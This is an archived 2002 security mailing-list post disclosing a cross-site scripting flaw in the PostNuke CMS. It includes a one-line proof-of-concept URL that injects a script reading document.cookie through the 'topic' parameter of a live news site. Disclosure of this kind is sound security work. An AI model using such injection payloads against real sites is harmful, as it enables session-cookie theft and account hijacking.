Postnuke XSS issues

From: Mark Grimes (markat_private)
Date: Wed Sep 25 2002 - 11:44:56 PDT

Next message: Martin Schulze: "[SECURITY] [DSA 149-2] New glibc packages fix"

Previous message: Boris Veytsman: "Re: iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflow in gv"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I got an awful lot of email from BUGTRAQers saying that the solution
for PHPNUKE's problems is to use Postnuke.  This is obviously not
a panacea.

http://news.postnuke.com/modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert(document.cookie);</script>

It's obviously apparent that CMS has a long way to go.  Godspeed
to those deploying it in production environments.  May the force be
with you.

-- 
Mark Grimes <markat_private>
Stateful Labs

Next message: Martin Schulze: "[SECURITY] [DSA 149-2] New glibc packages fix"
Previous message: Boris Veytsman: "Re: iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflow in gv"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Sep 26 2002 - 12:05:42 PDT